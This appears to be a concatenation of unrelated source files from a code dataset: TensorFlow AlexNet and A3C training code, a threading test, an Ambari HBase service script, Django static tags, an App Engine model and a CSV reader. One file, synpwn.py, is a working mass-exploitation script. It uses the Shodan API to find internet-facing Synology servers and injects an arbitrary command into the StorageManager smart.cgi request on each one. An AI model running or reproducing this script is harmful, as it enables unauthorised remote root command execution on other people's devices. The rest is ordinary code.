    convolution_weights4 = tf.Variable(initial_value=tf.truncated_normal(shape=[3, 3, 384, 384], seed=SEED,
                                                                         stddev=0.01, dtype=tf.float32), name="conv4")
    convolution_biases4 = tf.Variable(initial_value=tf.zeros(shape=[384], dtype=tf.float32), name="conv4_bias")
    convolution_weights5 = tf.Variable(initial_value=tf.truncated_normal(shape=[3, 3, 384, 256], seed=SEED,
                                                                         stddev=0.01, dtype=tf.float32), name="conv5")
    convolution_biases5 = tf.Variable(initial_value=tf.zeros(shape=[256], dtype=tf.float32), name="conv5_bias")
    fc1_weights = tf.Variable(
        initial_value=tf.truncated_normal(shape=[9216, 4096], stddev=0.01, seed=SEED, dtype=tf.float32), name="fc1")
    fc1_biases = tf.Variable(initial_value=tf.zeros(shape=[4096], dtype=tf.float32), name="fc1_bias")
    fc2_weights = tf.Variable(
        initial_value=tf.truncated_normal(shape=[4096, 4096], stddev=0.01, seed=SEED, dtype=tf.float32), name="fc2")
    fc2_biases = tf.Variable(initial_value=tf.zeros(shape=[4096], dtype=tf.float32), name="fc2_bias")
    fc3_weights = tf.Variable(
        initial_value=tf.truncated_normal(shape=[4096, LABEL], stddev=0.01, seed=SEED, dtype=tf.float32), name="fc3")
    # fc3_biases = tf.Variable(initial_value=tf.zeros(shape=[5], dtype=tf.float32))

    def forward(info=None, flag=False):
        # Builds the network graph; flag=True enables dropout (training).
        info = tf.reshape(info, [-1, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL])
        print (info.get_shape())
        conv1 = tf.nn.conv2d(input=info,
                             filter=convolution_weights_1,
                             padding="VALID",
                             strides=[1, 4, 4, 1])
        print (conv1.get_shape())
        # conv1_bn = batch_normalization(x=conv1, depth=conv1.get_shape()[-1], phase_train=flag)
        relu1 = tf.nn.relu(tf.nn.bias_add(conv1, convolution_biases_1))
        print (relu1.get_shape())
        pool1 = tf.nn.avg_pool(value=relu1,
                               ksize=[1, 3, 3, 1],
                               strides=[1, 2, 2, 1],
                               padding="VALID")
        print (pool1.get_shape())
        norm1 = tf.nn.local_response_normalization(pool1)
        # norm1 = batch_norm(pool1, flag)
        print (norm1.get_shape())
        conv2 = tf.nn.conv2d(input=norm1,
                             strides=[1, 1, 1, 1],
                             padding="SAME",
                             filter=convolution_weights2)
        # tf.nn.batch_normalization()
        # conv2_bn = batch_normalization(x=conv2, depth=conv2.get_shape()[-1], phase_train=flag)
        print (conv2.get_shape())
        relu2 = tf.nn.relu(tf.nn.bias_add(conv2, convolution_biases2))
        print (relu2.get_shape())
        pool2 = tf.nn.max_pool(value=relu2,
                               ksize=[1, 3, 3, 1],
                               strides=[1, 2, 2, 1],
                               padding="VALID")
        print (pool2.get_shape())
        norm2 = tf.nn.local_response_normalization(pool2)
        # norm2 = batch_norm(pool2, flag)
        print (norm2.get_shape())
        conv3 = tf.nn.conv2d(input=norm2,
                             strides=[1, 1, 1, 1],
                             padding="SAME",
                             filter=convolution_weights3)
        print (conv3.get_shape())
        relu3 = tf.nn.relu(tf.nn.bias_add(conv3, convolution_biases3))
        print (relu3.get_shape())
        conv4 = tf.nn.conv2d(input=relu3,
                             strides=[1, 1, 1, 1],
                             padding="SAME",
                             filter=convolution_weights4)
        print (conv4.get_shape())
        relu4 = tf.nn.relu(tf.nn.bias_add(conv4, convolution_biases4))
        print (relu4.get_shape())
        conv5 = tf.nn.conv2d(input=relu4,
                             strides=[1, 1, 1, 1],
                             padding="SAME",
                             filter=convolution_weights5)
        print (conv5.get_shape())
        relu5 = tf.nn.relu(tf.nn.bias_add(conv5, convolution_biases5))
        print (relu5.get_shape())
        pool5 = tf.nn.max_pool(value=relu5,
                               ksize=[1, 3, 3, 1],
                               strides=[1, 2, 2, 1],
                               padding="VALID")
        # Flatten conv output into the first fully-connected layer.
        fc = tf.reshape(pool5, [-1, fc1_weights.get_shape().as_list()[0]])
        # fc = batch_normalization(fc, depth=fc.get_shape()[-1], phase_train=flag)
        hidden_1 = tf.matmul(fc, fc1_weights) + fc1_biases
        hidden_1_relu = tf.nn.relu(hidden_1)
        # hidden_1_relu_bn = batch_norm(hidden_1_relu, flag)
        if flag:
            hidden_1_relu = tf.nn.dropout(hidden_1_relu, keep_prob=DROP_OUT)
        hidden_2 = tf.matmul(a=hidden_1_relu, b=fc2_weights) + fc2_biases
        hidden_2_relu = tf.nn.relu(hidden_2)
        hidden_2_relu_bn = batch_norm(hidden_2_relu, flag)
        if flag:
            hidden_2_relu_bn = tf.nn.dropout(hidden_2_relu_bn, keep_prob=DROP_OUT)
        hidden_3 = tf.matmul(hidden_2_relu_bn, fc3_weights)
        network = hidden_3
        return network

    # ---- losses, optimizer ----
    logits = forward(feed_train_data, True)
    loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, feed_train_label))
    regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
                    tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases) +
                    tf.nn.l2_loss(fc3_weights))
    loss += REGULAR * regularizers
    train_predict = tf.nn.softmax(logits)
    eval_logits = forward(feed_eval_data, False)
    eval_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(eval_logits, feed_eval_label))
    eval_predict = tf.nn.softmax(eval_logits)
    TENSOR_GLOBAL_STEP = tf.Variable(0, dtype=tf.int64)
    learning_rate = tf.train.exponential_decay(
        LEARNING_RATE,  # Base learning rate.
        TENSOR_GLOBAL_STEP,  # Current index into the dataset.
        DECAY_STEPS,  # Decay step.
        DECAY_RATE,  # Decay rate.
        staircase=True)
    # optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss=loss)
    # optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate, decay=DECAY_RATE).minimize(loss)
    optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,
                                           momentum=MOMENTUM).minimize(loss=loss,
                                                                       global_step=TENSOR_GLOBAL_STEP)
    # optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
    # optimizer = tf.train.AdagradOptimizer(learning_rate=learning_rate).minimize(loss=eval_loss)
    # optimizer = tf.train.FtrlOptimizer(learning_rate=learning_rate).minimize(loss)
    # optimizer = tf.train.ProximalGradientDescentOptimizer(learning_rate).minimize(loss)
    with tf.Session() as sess:
        print ("INIT.")
        print (SEED)
        init = tf.global_variables_initializer()
        sess.run(init)
        tf.summary.scalar(name="learning", tensor=learning_rate)
        tf.summary.histogram(name="learning", values=learning_rate)
        tf.summary.scalar(name="regularizers", tensor=regularizers * REGULAR)
        tf.summary.histogram(name="regularizers", values=regularizers * REGULAR)
        tf.summary.scalar(name="loss", tensor=loss - REGULAR * regularizers)
        tf.summary.histogram(name="loss", values=loss - REGULAR * regularizers)
        tf.summary.scalar(name="eval_loss", tensor=eval_loss)
        tf.summary.histogram(name="eval_loss", values=eval_loss)
        merge_op = tf.summary.merge_all()
        train_writer = tf.summary.FileWriter(logdir="./log/train/", graph=sess.graph)
        valid_writer = tf.summary.FileWriter(logdir="./log/valid")
        limit = TRAIN_SIZE // BATCH_SIZE + 1
        limit_eval = EVAL_SIZE // BATCH_SIZE + 1
        acc_loss = 1000
        saver = tf.train.Saver()
        # Train until the most recent eval loss is small enough.
        while acc_loss > 0.2:
            for step in range(GLOBAL_STEP):
                if step % REPORT_CONTROL == 0:
                    # ---- evaluation pass over all eval batches ----
                    ave_eval_loss = 0.0
                    ave_eval_acc = 0.0
                    print ("STEP %d " % step)
                    print ("------------------------------------>")
                    for batch in range(limit_eval):
                        print ("EVAL BATCH SIZE FOR %d " % batch)
                        if batch == limit_eval - 1:
                            start = batch * BATCH_SIZE
                            end = EVAL_SIZE
                            if end - start == 0:
                                continue
                        else:
                            start = batch * BATCH_SIZE
                            end = start + BATCH_SIZE
                        input = eval_data[start:end]
                        input_label = eval_label[start:end]
                        feed_dict = {feed_eval_data: input,
                                     feed_eval_label: input_label}
                        _eval_predict, _eval_loss, _regularizers = sess.run(
                            [eval_predict, eval_loss, regularizers],
                            feed_dict=feed_dict)
                        media = np.argmax(_eval_predict, 1)
                        array = np.argmax(input_label, 1)
                        acc_sum = np.sum(media == array)
                        accurate = (acc_sum / float(end - start))
                        acc_loss = _eval_loss
                        _regularizers *= REGULAR
                        print (media)
                        print (array)
                        ave_eval_loss += _eval_loss
                        ave_eval_acc += accurate
                        print ("accurate %f " % accurate)
                        print ("loss %s " % str(_eval_loss))
                        print ("regularizers %f " % _regularizers)
                        print ("------------------------------------>")
                        if end == EVAL_SIZE:
                            # NOTE(review): divides by ``batch`` here but by
                            # ``batch + 1`` in the training section -- looks
                            # like an off-by-one; confirm intent.
                            ave_eval_loss = ave_eval_loss / (batch)
                            ave_eval_acc = ave_eval_acc / (batch)
                            print ("average eval acc %f " % ave_eval_acc)
                            print ("average eval loss %f " % ave_eval_loss)
                            if ave_eval_loss > 0:
                                if ave_eval_acc >= 0.95 or ave_eval_loss <= 0.15:
                                    # Checkpoint when eval quality is good.
                                    model = "alexnet-eval-acc-" + str(ave_eval_acc) + "-loss-" + str(
                                        ave_eval_loss) + ".model"
                                    path = saver.save(sess, model)
                                    print ("save model for %s " % path)
                # ---- one training epoch over all train batches ----
                ave_train_loss = 0.0
                ave_train_acc = 0.0
                for batch in xrange(limit):
                    if batch == limit - 1:
                        start = batch * BATCH_SIZE
                        end = TRAIN_SIZE
                        if end - start == 0:
                            continue
                    else:
                        start = batch * BATCH_SIZE
                        end = start + BATCH_SIZE
                    input = train_data[start:end]
                    input_label = train_label[start:end]
                    feed_dict = {feed_train_data: input,
                                 feed_train_label: input_label}
                    _loss, _optimizer, _train_predict, _regular, _learn_rate = sess.run(
                        [loss, optimizer, train_predict, regularizers, learning_rate],
                        feed_dict=feed_dict)
                    _adjust_regular = _regular * np.float16(REGULAR)
                    media = np.argmax(_train_predict, 1)
                    array = np.argmax(input_label, 1)
                    temp = np.sum(media == array)
                    if step % REPORT_CONTROL == 0:
                        accurate = (temp / float(end - start))
                        print ("*************************>")
                        print ("batch for %d " % batch)
                        print ("loss %f" % _loss)
                        print ("regular %f" % _adjust_regular)
                        print ("accurate %f " % accurate)
                        print ("learn_rate %f " % _learn_rate)
                        print ("*************************<")
                        ave_train_loss += _loss - float(_adjust_regular)
                        ave_train_acc += accurate
                        if end == TRAIN_SIZE:
                            ave_train_loss = ave_train_loss / (batch + 1)
                            ave_train_acc = ave_train_acc / (batch + 1)
                            print ("average train acc : %f " % ave_train_acc)
                            print ("average train loss : %f " % ave_train_loss)
                            if ave_train_loss > 0:
                                if ave_train_acc >= 0.95 or ave_train_loss <= 0.15:
                                    model = "alexnet-train-acc-" + str(ave_train_acc) + "-loss-" + str(
                                        ave_train_loss) + ".ckpt"
                                    path = saver.save(sess, model)
                                    print ("save model for %s " % path)
        print ("train over.")
        return
# tf.app.run() parses TF flags and then invokes main(argv).
if '__main__' == __name__:
    tf.app.run()
|
ElvisLouis/code
|
work/ML/tensorflow/separa/scatter_alexnet.py
|
Python
|
gpl-2.0
| 17,960
|
import threading
import time
def print_i(num):
    """Sleep one second, then print the live thread count and ``num``
    once for every value in ``range(num)``."""
    time.sleep(1)
    for i in range(0, num):
        print("thread #: ", threading.active_count())
        print(num)
# Spawn one daemon thread per value of i.
for i in range(0, 100):
    # BUG FIX: the original wrote ``target=print_i(i)``, which CALLS
    # print_i immediately on the main thread and hands Thread its return
    # value (None) -- no work ever ran on the spawned threads.  Pass the
    # callable plus args instead.  ``daemon=True`` replaces the
    # deprecated setDaemon() call.
    thread = threading.Thread(target=print_i, args=(i,), daemon=True)
    thread.start()
|
billlai95/bilimining
|
biligrab/ThreadingTest.py
|
Python
|
apache-2.0
| 288
|
#!/usr/bin/env python3
# Author: LukeBob
#
# Requires: argparse, shodan, requests pip install them if needed.
# Run with: python3 synPwn.py --key <Shodan API Key> --cmd "<Command to try and execute>"
#
# python3 script for testing the (Synology StorageManager 5.2 - Root Remote Command Execution) exploit found by, (Weibo: SecuriTeam_SSD Twitter: @SecuriTeam_SSD)
# Uses the shodan library to find the targets running synology and runs specified command given in --cmd param
# use, "python3 synpwn.py" -h ,for more help
# For more information on the exploit visit: https://www.exploit-db.com/exploits/43190/
#
# Note THIS SCRIPT CAN GET YOU IN A LOT OF TROUBLE, PROBABLY NOT WORTH THE HASSLE; ANYTHING YOU DO WITH THIS SCRIPT IS ON YOUR BEHALF,
# AND YOURS ALONE!
#
# READ ^^^
import requests
import argparse
import shodan
# CLI definition: --key (Shodan API key) and --cmd (command to execute on
# each target).  main() prints help when either is missing.
parser = argparse.ArgumentParser(description="SynPwn, run remote code on Servers running 'Synology StorageManager 5.2'", epilog='Author: (Lukebob)')
parser.add_argument("--key", help='Shodan key')
parser.add_argument("--cmd", help='Command to run on system, if spaces in command wrap the command in quotes')
args = parser.parse_args()
## colours
class Color():
    """ANSI escape-sequence helpers for colourised terminal output.

    Each method wraps the given text in a colour code and resets the
    terminal colour afterwards.
    """

    @staticmethod
    def red(str):
        return "".join(("\033[91m", str, "\033[0m"))

    @staticmethod
    def green(str):
        return "".join(("\033[92m", str, "\033[0m"))

    @staticmethod
    def yellow(str):
        return "".join(("\033[93m", str, "\033[0m"))

    @staticmethod
    def blue(str):
        return "".join(("\033[94m", str, "\033[0m"))
## Creates New Shodan Api Object
def make_api(key):
    """Create and validate a Shodan API client for *key*.

    Exits the process when the key is missing/too short or rejected by
    the Shodan service; otherwise returns the validated client.
    """
    if not key or len(key) <= 1:
        # BUG FIX: the original only printed here and then fell through to
        # ``return api`` with ``api`` unbound, raising UnboundLocalError.
        print(Color.red("[+] Error:") + " Please enter valid Api Key")
        exit(0)
    try:
        api = shodan.Shodan(key)
        # info() performs a round-trip that validates the key.
        api.info()
    except shodan.exception.APIError as e:
        print('[+] Error: %s' % e)
        exit(0)
    return api
## Tries to run the command on the target
def exploit(target):
    """Attempt the smart.cgi command injection against *target*.

    Returns the HTTP status code (an int) on success, or None if the
    request raised -- callers must handle both cases.
    """
    try:
        # args.cmd is injected into the 'disk' parameter (EDB-43190).
        url = ("http://{0}/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda'{1}''".format(target, args.cmd))
        r=requests.get(url)
        stat = r.status_code
        return(stat)
    except Exception as e:
        # Network errors are reported but not fatal; implicitly returns None.
        print(Color.red("[+] Error: ")+" {0}".format(e))
        pass
## Iterates through targets, printing vulnerable/invulnerable ip, hostname, country
def search(api):
    """Query Shodan for Synology hosts and report the exploit result per host."""
    try:
        results = api.search("Synology port:80")
    except shodan.APIError as e:
        print(Color.red("[+] Error: ") + "{0}".format(e))
        exit(0)
    for result in results['matches']:
        country = result['location']['country_name']
        hostname = result['hostnames']
        target = result['ip_str']
        status = exploit(target)
        # BUG FIX: exploit() returns an int (or None on error) but the
        # original compared against the STRING "200", so the vulnerable
        # branch could never be taken.  Also, both report templates had
        # five placeholders ({0}-{4}) but only four arguments, raising
        # IndexError -- ``country`` was computed but never passed.
        if status == 200:
            verdict = Color.green("Vulnerable")
        else:
            verdict = Color.red("Not Vulnerable")
        print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, country, Color.red(args.cmd), verdict))
def main():
    """Entry point: validate the CLI arguments, then run the Shodan scan."""
    # Guard clause: both --cmd and --key are required.
    if not (args.cmd and args.key):
        parser.print_help()
        return
    api = make_api(args.key)
    search(api)
# Run only when executed as a script.
if __name__ == '__main__':
    main()
|
LukeBob/bobstools-py
|
synpwn.py
|
Python
|
mit
| 3,694
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management import *
def hbase_service(
    name,
    action = 'start'): # 'start' or 'stop' or 'status'

    """Start or stop an AMS HBase daemon (*name* is the role, e.g. 'master').

    Uses resource_management's ``format()``, which interpolates names like
    ``daemon_script`` and ``hbase_pid_dir`` from ``params`` / local scope.
    """
    import params

    role = name
    cmd = format("{daemon_script} --config {hbase_conf_dir}")
    pid_file = format("{hbase_pid_dir}/hbase-{hbase_user}-{role}.pid")
    # Succeeds only when the pid file exists AND that process is alive.
    no_op_test = format("ls {pid_file} >/dev/null 2>&1 && ps `cat {pid_file}` >/dev/null 2>&1")

    if action == 'start':
        daemon_cmd = format("{cmd} start {role}")
        Execute ( daemon_cmd,
            not_if = no_op_test,   # skip if the daemon is already running
            user = params.hbase_user
        )
    elif action == 'stop':
        daemon_cmd = format("{cmd} stop {role}")
        Execute ( daemon_cmd,
            user = params.hbase_user,
            # BUGFIX: hbase regionserver sometimes hangs when nn is in safemode
            timeout = params.hbase_regionserver_shutdown_timeout,
            # On timeout, force-kill the process recorded in the pid file.
            on_timeout = format("{no_op_test} && {sudo} -H -E kill -9 `{sudo} cat {pid_file}`")
        )
        # Remove the stale pid file after a stop.
        File(pid_file,
            action = "delete",
        )
|
alexryndin/ambari
|
ambari-server/src/main/resources/common-services/AMBARI_METRICS/0.1.0/package/scripts/hbase_service.py
|
Python
|
apache-2.0
| 1,796
|
from django import template
from django.apps import apps
from django.utils.encoding import iri_to_uri
from django.utils.six.moves.urllib.parse import urljoin
# Template-tag registry for this module's tags ({% static %}, prefixes).
register = template.Library()
class PrefixNode(template.Node):
    """Template node that renders (or stores into a variable) a URL prefix
    read from a named Django setting such as STATIC_URL or MEDIA_URL."""

    def __repr__(self):
        return "<PrefixNode for %r>" % self.name

    def __init__(self, varname=None, name=None):
        if name is None:
            raise template.TemplateSyntaxError(
                "Prefix nodes must be given a name to return.")
        self.varname = varname
        self.name = name

    @classmethod
    def handle_token(cls, parser, token, name):
        """
        Class method to parse prefix node and return a Node.
        """
        # token.split_contents() isn't useful here because tags using this method don't accept variable as arguments
        tokens = token.contents.split()
        if len(tokens) > 1 and tokens[1] != 'as':
            raise template.TemplateSyntaxError(
                "First argument in '%s' must be 'as'" % tokens[0])
        if len(tokens) > 1:
            # Form: {% tag as varname %}
            varname = tokens[2]
        else:
            varname = None
        return cls(varname, name)

    @classmethod
    def handle_simple(cls, name):
        """Return the setting *name* as an IRI-encoded prefix ('' if unset
        or if settings cannot be imported)."""
        try:
            from django.conf import settings
        except ImportError:
            prefix = ''
        else:
            prefix = iri_to_uri(getattr(settings, name, ''))
        return prefix

    def render(self, context):
        prefix = self.handle_simple(self.name)
        if self.varname is None:
            return prefix
        # {% ... as var %} stores the prefix instead of emitting it.
        context[self.varname] = prefix
        return ''
@register.tag
def get_static_prefix(parser, token):
    """
    Populates a template variable with the static prefix,
    ``settings.STATIC_URL``.

    Usage::

        {% get_static_prefix [as varname] %}

    Examples::

        {% get_static_prefix %}
        {% get_static_prefix as static_prefix %}
    """
    # Delegates parsing to PrefixNode, bound to the STATIC_URL setting.
    return PrefixNode.handle_token(parser, token, "STATIC_URL")
@register.tag
def get_media_prefix(parser, token):
    """
    Populates a template variable with the media prefix,
    ``settings.MEDIA_URL``.

    Usage::

        {% get_media_prefix [as varname] %}

    Examples::

        {% get_media_prefix %}
        {% get_media_prefix as media_prefix %}
    """
    # Delegates parsing to PrefixNode, bound to the MEDIA_URL setting.
    return PrefixNode.handle_token(parser, token, "MEDIA_URL")
class StaticNode(template.Node):
    """Template node backing {% static path [as varname] %}."""

    def __init__(self, varname=None, path=None):
        if path is None:
            raise template.TemplateSyntaxError(
                "Static template nodes must be given a path to return.")
        self.path = path
        self.varname = varname

    def url(self, context):
        # self.path is a compiled filter expression; resolve it against
        # the current context before building the URL.
        path = self.path.resolve(context)
        return self.handle_simple(path)

    def render(self, context):
        url = self.url(context)
        if self.varname is None:
            return url
        # {% static ... as var %} stores the URL instead of emitting it.
        context[self.varname] = url
        return ''

    @classmethod
    def handle_simple(cls, path):
        if apps.is_installed('django.contrib.staticfiles'):
            # Let the configured staticfiles storage build the URL.
            from django.contrib.staticfiles.storage import staticfiles_storage
            return staticfiles_storage.url(path)
        else:
            return urljoin(PrefixNode.handle_simple("STATIC_URL"), path)

    @classmethod
    def handle_token(cls, parser, token):
        """
        Class method to parse prefix node and return a Node.
        """
        bits = token.split_contents()
        if len(bits) < 2:
            raise template.TemplateSyntaxError(
                "'%s' takes at least one argument (path to file)" % bits[0])
        path = parser.compile_filter(bits[1])
        # Form: {% static path as varname %} -> second-to-last bit is 'as'.
        # NOTE(review): varname is read from bits[3], which assumes exactly
        # one path argument before 'as' -- confirm against the tag grammar.
        if len(bits) >= 2 and bits[-2] == 'as':
            varname = bits[3]
        else:
            varname = None
        return cls(varname, path)
@register.tag('static')
def do_static(parser, token):
    """
    Joins the given path with the STATIC_URL setting.

    Usage::

        {% static path [as varname] %}

    Examples::

        {% static "myapp/css/base.css" %}
        {% static variable_with_path %}
        {% static "myapp/css/base.css" as admin_base_css %}
        {% static variable_with_path as varname %}
    """
    return StaticNode.handle_token(parser, token)
def static(path):
    """
    Given a relative path to a static asset, return the absolute path to the
    asset.

    Programmatic (non-template) counterpart of the {% static %} tag.
    """
    return StaticNode.handle_simple(path)
|
KrzysztofStachanczyk/Sensors-WWW-website
|
www/env/lib/python2.7/site-packages/django/templatetags/static.py
|
Python
|
gpl-3.0
| 4,391
|
from google.appengine.ext import db
from datetime import datetime
class People(db.Model):
    """App Engine datastore model for a user account."""

    # Identity and contact fields.
    first_name = db.StringProperty()
    last_name = db.StringProperty()
    email_addr = db.StringProperty()
    acq_source = db.StringProperty()   # where the account came from
    fb_uid = db.StringProperty()       # Facebook user id
    ss_uid = db.StringProperty()       # NOTE(review): external uid -- confirm which service
    dob = db.StringProperty()
    gender = db.StringProperty()
    createdon = db.DateTimeProperty()
    last_login = db.DateTimeProperty()
    passwd = db.StringProperty()

    def to_dict(self):
        """Return a JSON-friendly dict of this entity (dates formatted,
        password removed, datastore id added)."""
        # _entity holds the raw property dict of the datastore entity.
        our_dict = self.__dict__.copy()['_entity']
        our_dict['id'] = self.key().id()
        our_dict['createdon'] = self.createdon.strftime('%d %b %Y') if self.createdon else ''
        our_dict['last_login'] = self.last_login.strftime('%d %b %Y') if self.last_login else ''
        # Never expose the stored password.
        if 'passwd' in our_dict:
            del our_dict['passwd']
        return our_dict

    def update(self, new_values):
        """Assign each key of *new_values* as an attribute; returns self
        so the caller can chain a put()."""
        for p in new_values:
            self.__setattr__(p, new_values.get(p))
        return self
|
mathurakshay/gae-social-login
|
models/people.py
|
Python
|
unlicense
| 975
|
#See also: http://www.doughellmann.com/PyMOTW/csv/
import sys
import csv
# Internet media type used to flag input that failed the CSV sanity check.
UNKNOWN_TEXT_IMT = 'text/unknown'

def readcsv(text):
    """Parse *text* as CSV into a list of per-row dicts (Python 2 code).

    Uses csv.Sniffer to guess the dialect and whether a header is present.
    Header rows become dict keys; headerless rows get synthetic keys
    'field0', 'field1', ...  Every row dict also gets 'label' and 'id'
    entries of the form '_<rownum>'.  Rows are decoded as ISO-8859-1.
    Returns [] when row lengths are inconsistent (sanity check failed).
    """
    sniffer = csv.Sniffer()
    data = []
    #Heuristic: is this really a CSV? Sniffer is pretty lax
    sanity_check_length = None
    try:
        # Sniff the dialect from the first 2KB only.
        dialect = csv.Sniffer().sniff(text[:2048])
        sniff_success = True
    except (KeyboardInterrupt, SystemExit):
        raise
    except Exception, e:
        sniff_success = False
    lines = text.splitlines()
    #print >> sys.stderr, lines[:2], dialect.__dict__
    # NOTE(review): has_header() is given a single line (lines[3]) rather
    # than a multi-line sample -- looks suspicious; confirm intent.
    if sniff_success and sniffer.has_header(lines[3]):
        reader = csv.DictReader(lines, dialect=dialect)
        for count, row in enumerate(reader):
            #print >> sys.stderr, row
            if sanity_check_length is None:
                # First row fixes the expected column count.
                sanity_check_length = len(row)
            elif not(row):
                continue
            elif len(row) != sanity_check_length:
                # Inconsistent width: treat the whole input as non-CSV.
                print 1, (len(row),sanity_check_length)
                data = []
                imt = UNKNOWN_TEXT_IMT
                break
            #data.append(row)
            data.append(dict(((k or '').decode('iso-8859-1'), val.decode('iso-8859-1')) for (k, val) in row.iteritems()))
            data[-1]['label'] = '_' + str(count)
            data[-1]['id'] = '_' + str(count)
        #for line in islice(text.split(dialect.lineterminator), 0, 2):
        #    if len(line.split(dialect.delimiter))
    elif sniff_success:
        # No header: same loop, but with positional 'fieldN' keys.
        reader = csv.reader(lines, dialect=dialect)
        #reader = csv.reader(text, delimiter=',', lineterminator='\n')
        for count, row in enumerate(reader):
            #print >> sys.stderr, row
            if sanity_check_length is None:
                sanity_check_length = len(row)
            elif not(row):
                continue
            elif len(row) != sanity_check_length:
                print 2, (len(row),sanity_check_length)
                data = []
                imt = UNKNOWN_TEXT_IMT
                break
            data.append(dict((u'field%i'%i, val.decode('iso-8859-1')) for (i, val) in enumerate(row)))
            data[-1]['label'] = '_' + str(count)
            data[-1]['id'] = '_' + str(count)
    return data
#
def compare_csv_dialects(a, b, attributes=[name for name in dir(csv.Dialect) if not name.startswith("_")]):
    #Pretty obvious, but nevertheless stolen from http://groups.google.com/group/comp.lang.python/browse_thread/thread/9de18eeabd38faff
    """
    Return True when dialects *a* and *b* agree on every public
    csv.Dialect attribute (delimiter, quotechar, ...).

    BUG FIX (docs): the doctests previously called an undefined name
    ``eq`` instead of this function.

    >>> d = csv.Sniffer().sniff("1,2,3")
    >>> compare_csv_dialects(d, csv.Sniffer().sniff("3,4,5"))
    True
    >>> compare_csv_dialects(d, csv.Sniffer().sniff("'3','4','5'"))
    False
    >>> compare_csv_dialects(d, csv.Sniffer().sniff("3;4;5"))
    False
    >>> compare_csv_dialects(d, csv.Sniffer().sniff("3,4,' 5'"))
    True
    """
    # Missing attributes compare as None == None, i.e. "equal".
    return all(getattr(a, n, None) == getattr(b, n, None) for n in attributes)
|
zepheira/zenpub
|
lib/csvhelper.py
|
Python
|
apache-2.0
| 2,836
|
import frappe
import apt
|
StrellaGroup/strella-devops
|
fabric/fabfile/__init__.py
|
Python
|
mit
| 25
|
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
import tensorflow.contrib.rnn as rnn
import scipy.signal
import ucv_utils
from command import Commander
from schedule import Schedule
def normalized_columns_initializer(std=1.0):
    """Return a TF weight initializer drawing Gaussian samples whose
    columns are rescaled so each has norm *std*."""
    def _initializer(shape, dtype=None, partition_info=None):
        sample = np.random.randn(*shape).astype(np.float32)
        column_norms = np.sqrt(np.square(sample).sum(axis=0, keepdims=True))
        sample *= std / column_norms
        return tf.constant(sample)
    return _initializer
def update_target_graph(from_scope, to_scope):
    """Build ops that copy every trainable variable in *from_scope* onto
    the positionally-matching variable in *to_scope*."""
    source_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
    target_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
    return [dst.assign(src) for src, dst in zip(source_vars, target_vars)]
def discount(x, gamma):
    """Discounted cumulative sums of *x*: out[i] = sum_k gamma**k * x[i+k].

    Implemented as a first-order IIR filter over the reversed sequence.
    """
    reversed_x = x[::-1]
    filtered = scipy.signal.lfilter([1], [1, -gamma], reversed_x, axis=0)
    return filtered[::-1]
class ACNetwork:
    """ Actor-Critic Network Class """

    def __init__(self, scope, trainer, config, start_step):
        """Build the A3C graph (CNN encoder -> LSTM -> policy/value heads,
        plus optional depth-prediction auxiliary heads).  Loss/gradient ops
        are only built for worker scopes (scope != 'global')."""
        schedule = Schedule(config)
        # Graph Definition
        with tf.variable_scope(scope):
            # input image
            self.inputs = tf.placeholder(shape=[None]+config.STATE_SHAPE, dtype=tf.float32, name='input_image')
            # one-hot depth labels for each depth pixel (4x16 grid, 8 bins each)
            self.aux_depth_labels = [tf.placeholder(shape=[None] + [8], dtype=tf.float32, name='depth_px_{}'.format(i)) for i in range(4*16)]
            # sin(heading_error)
            self.direction_input = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='heading_error_input')
            # angular velocity state
            self.velocity_state = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='velocity_state')
            # previous action
            self.prev_action = tf.placeholder(shape=[None, config.ACTIONS], dtype=tf.float32, name='previous_action')
            # previous reward
            self.prev_reward = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='previous_reward')
            # entropy reward scheduling parameter
            self.entropy_parameter = schedule.entropy(start_step)
            print('Entropy parameter set to {}'.format(schedule.entropy(start_step)))
            # convolutional encoder
            self.conv1 = slim.conv2d(inputs=self.inputs,
                                     num_outputs=16,
                                     kernel_size=[8, 8],
                                     stride=[4, 4],
                                     padding='VALID',
                                     activation_fn=tf.nn.elu)
            self.conv2 = slim.conv2d(inputs=self.conv1,
                                     num_outputs=32,
                                     kernel_size=[4, 4],
                                     stride=[2, 2],
                                     padding='VALID',
                                     activation_fn=tf.nn.elu)
            hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu)
            # Concatenating additional inputs with CNN outputs (config flags
            # decide which extra signals the agent receives).
            layers_to_concat = [hidden]
            if config.GOAL_ON:
                layers_to_concat.append(self.direction_input)
            if config.ACCELERATION_ACTIONS:
                layers_to_concat.append(self.velocity_state)
            if config.PREV_REWARD_ON:
                layers_to_concat.append(self.prev_reward)
            if config.PREV_ACTION_ON:
                layers_to_concat.append(self.prev_action)
            concatenated = tf.concat(layers_to_concat, axis=1)
            # Add a fake batch dimension of 1: the LSTM treats the batch
